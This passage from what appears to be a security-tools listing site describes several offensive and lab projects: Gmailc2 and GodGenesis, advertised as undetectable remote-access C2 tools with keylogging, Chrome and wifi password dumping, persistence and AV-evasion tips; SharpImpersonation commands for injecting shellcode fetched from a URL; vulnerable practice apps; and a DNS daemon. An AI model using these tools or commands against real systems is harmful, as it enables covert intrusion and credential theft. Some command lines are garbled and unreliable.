    • Good question! The ssh fingerprinting module identifies the various cryptographic options supported by the server when collecting metadata during the handshake process. This makes use of a few unexported functions, which is why the Go cryptography libraries are included here with an export.go file.
  • Fingerprintx is not designed to identify open ports on the target systems and assumes that every target:port input is open. If none of the ports are open there will be no output as there are no services running on the targets.
  • How does this compare to zgrab2?
    • The zgrab2 command line usage (and use case) is slightly different than fingerprintx. For zgrab2, the protocol must be specified ahead of time: echo | zgrab2 http -p 8000, which assumes you already know what is running there. For fingerprintx, that is not the case: echo | fingerprintx. The "application layer" protocol scanning approach is very similar.


fingerprintx is the work of a lot of people, including our great intern class of 2022. Here is a list of contributors so far:

Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions

 A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections 
and Network Traffic Restrictions


 This RAT communicates Via Gmail SMTP (or u can use any other smtps as well) but Gmail SMTP is valid
because most of the companies block unknown traffic so gmail traffic is valid and allowed everywhere.


 1. Don't Upload Any Payloads To Bcz This tool will not work
with Time.
2. Virustotal Share Signatures With AV Comapnies.
3. Again Don't be an Idiot!

How To Setup

 1. Create Two seperate Gmail Accounts.
2. Now enable SMTP On Both Accounts (check youtube if u don't know)
3. Suppose you have already created Two Seperate Gmail Accounts With SMTP enabled
A -> first account represents
B -> 2nd account represents
4. Now Go To file and fill the following at line 67:
smtpserver="" (don't change this)
imapserver="" (don't change this)
5. Now Go To file and fill the following at line 16:
imapserver = "" (dont change this)
username = ""
password = "your2ndgmailapp password"
getting = ""
smtpserver = "" (don 't change this)
6. Enjoy

How To Run:-

 *:- For Windows:-
1. Make Sure python3 and pip is installed and requriements also installed
2. python (on server side)

*:- For Linux:-
1. Make Sure All Requriements is installed.
2. python3 (on server side)

C2 Feature:-

 1) Persistence (type persist)
2) Shell Access
3) System Info (type info)
4) More Features Will Be Added


1) FUD Ratio 0/40
2) Bypass Any EDR's Solutions
3) Bypass Any Network Restrictions
4) Commands Are Being Sent in Base64 And Decoded on server side
5) No More Tcp Shits


Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.

VuCSA - Vulnerable Client-Server Application - Made For Learning/Presenting How To Perform Penetration Tests Of Non-Http Thick Clients

Vulnerable Client-Server Application

Vulnerable client-server application (VuCSA) is made for learning/presenting how to perform penetration tests of non-http thick clients. It is written in Java (with JavaFX graphical user interface).

Currently the vulnerable application contains the following challenges:

  1. Buffer Over-read (simulated)
  2. Command Execution
  3. SQL Injection
  4. Enumeration
  5. XML
  6. Horizontal Access Control
  7. Vertical Access Control

If you want to know how to solve these challenges, take a look at the PETEP website, which describes how to use the open-source tool PETEP to exploit them.

Tip: Before you start hacking, do not forget to check the data structure of messages bellow.

How to Run

In order to run the vulnerable server and client, you can use one of releases on GitHub or run gradle assemble, which creates distribution packages (for both Windows and Unix). These packages contain sh/bat scripts that will run the server and client using JVM.

Project Structure

Project is divided into three modules:

  • vucsa-common - common functionality for both client and server (including protocol processing utilities)
  • vucsa-client - vulnerable client with JavaFX GUI
  • vucsa-server - vulnerable server for terminal use

Data Structure

Messages transmitted between server and client have the following simple format:

32b 32b 32b ???

These four parts have the following meaning:

  • type - type of the message (used for serialization/deserialization)
  • target - target handler that will receive the message
  • length - length of the payload
  • payload - data serialized into bytes

GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints

God Genesis is a C2 server purely coded in Python3 created to help Red Teamers and Penetration Testers. Currently It only supports TCP reverse shell but wait a min, its a FUD and can give u admin shell from any targeted WINDOWS Machine.

The List Of Commands It Supports :-

help --> Show This Options
terminate --> Exit The Shell Completely
exit --> Shell Works In Background And Prompted To C2 Server
clear --> Clear The Previous Outputs

cd --& gt; Change Directory
pwd --> Prints Current Working Directory
mkdir *dir_name* --> Creates A Directory Mentioned
rm *dir_name* --> Deletes A Directoty Mentioned
powershell [command] --> Run Powershell Command
start *exe_name* --> Start Any Executable By Giving The Executable Name

env --> Checks Enviornment Variables
sc --> Lists All Services Running
user --> Current User
info --> Gives Us All Information About Compromised System
av --> Lists All antivirus In Compromised System

download *file_name* --> Download Files From Compromised System
upload *file_name* --> Uploads Files To Victim Pc

========================================================== =========================================
persistence1 --> Persistance Via Method 1
persistence2 --> Persistance Via Method 2
get --> Download Files From Any URL
chrome_pass_dump --> Dump All Stored Passwords From Chrome Bowser
wifi_password --> Dump Passwords Of All Saved Wifi Networks
keylogger --> Starts Key Logging Via Keylogger
dump_keylogger --> Dump All Logs Done By Keylogger
python_install --> Installs Python In Victim Pc Without UI

Features Of Our Framework :-

Check The Video To Get A Detail Knowledge

1. The is a FULLY UNDETECTABLE(FUD) use your own techniques for making an exe file. (Best Result When Backdoored With Some Other Legitimate Applictions)
2. Able to perform privilege escalation on any windows systems.
3. Fud keylogger
4. 2 ways of achieving persistance
5. Recon automation to save your time.

How To Use Our Tool :

git clone

pip3 install -r requirements.txt


It is worth mentioning that Suman Chakraborty have contributed in the framework by coding the the the Fud Keyloger, Wifi Password Extraction and Chrome Password Dumper modules.

Dont Forget To Change The IP ADDRESS Manually in both and

Erlik 2 - Vulnerable-Flask-App

Erlik 2 - Vulnerable-Flask-App

Tested - Kali 2022.1


It is a vulnerable Flask Web App. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


It contains the following vulnerabilities.

  • HTML Injection
  • XSS
  • SSTI
  • SQL Injection
  • Information Disclosure
  • Command Injection
  • Brute Force
  • Deserialization
  • Broken Authentication
  • DOS
  • File Upload


git clone

cd Vulnerable-Flask-App

sudo pip3 install -r requirements.txt




SharpImpersonation - A User Impersonation Tool - Via Token Or Shellcode Injection

This was a learning by doing project from my side. Well known techniques are used to built just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:

A blog post for the intruduction can be found here:

List user processes

PS > PS C:\temp> SharpImpersonation.exe list

List only elevated processes

PS > PS C:\temp> SharpImpersonation.exe list elevated

Impersonate the first process of the target user to start a new binary

PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>

Inject base64 encoded shellcode into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>

Inject shellcode loaded from a webserver into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>

Impersonate the target user via ImpersonateLoggedOnuser for the current session

PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

Erlik - Vulnerable Soap Service

Erlik - Vulnerable Soap Service

Tested - Kali 2022.1


It is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


It contains the following vulnerabilities.

  • LFI
  • SQL Injection
  • Informaion Disclosure
  • Command Inejction
  • Brute Force
  • Deserialization


git clone

cd Vulnerable-Soap-Service

sudo pip3 install requirements.txt


sudo python3

Exploiting Vulnerabilities



SQL Injection


Informaion Disclosure



Command Injection


Brute Force




PR-DNSd - Passive-Recursive DNS Daemon

Passive-Recursive DNS daemon.


nameserver | sudo tee /etc/resolv.conf dig dig -x $(dig +short">
go get
sudo setcap cap_net_bind_service,cap_sys_chroot=ep go/bin/PR-DNSd
go/bin/PR-DNSd -upstream -listen
echo nameserver | sudo tee /etc/resolv.conf
dig -x $(dig +short

If you can't use setcap, you have to use -chroot "" and -listen :<high_port> options, or run as root.

Use cases

  • run as local host DNS service, to fix your netstat/tcpview/lsof etc. output
  • as enterprise-internal DNS server, to also be able to do meaningful EDR/IR and log analysis
  • as cloud service, to also collect Passive DNS data from non-enterprise (home, BYOD etc.) devices
    • hint: you probably want to configure DDoS protection options
  • in cloud as DNS-over-TLS server, to additionally provide private DNS for supporting devices (ex: Android 9's private DNS setting)
    • ex: domain pattern based firewall/proxy configuration for mobile devices

Running as your own private server for Android9's Private DNS settings

After appropriate setcap, run:

PR-DNSd -tlslisten :853 -cert YOUR_SERVER_CRT_KEY_PEM -upstream -store pr-dnsd


-cert string
TCP-TLS listener certificate (required for tls listener)
-chroot string
chroot to directory after start (default "/var/tmp")
-count int
Count of replies allowed before debounce delay is applied (default 100)
-ctmout string
Client timeout for upstream queries
-debounce string
Required time duration between UDP replies to single IP to prevent DoS (default "200ms")
-key string
TCP-TLS certificate key (default same as -cert value)
-listen string
listen address (default ":53")
Don't report normal data
-store string
Store PTR data to specified file
-tlslisten string
TCP-TLS listener address (default ":853")
-upstream string
upstream DNS serv er (tcp-tls:// prefix for DoT) (default "")
(with tls and chroot, ensure ca-certificates and resolv.conf in chroot are properly set up)
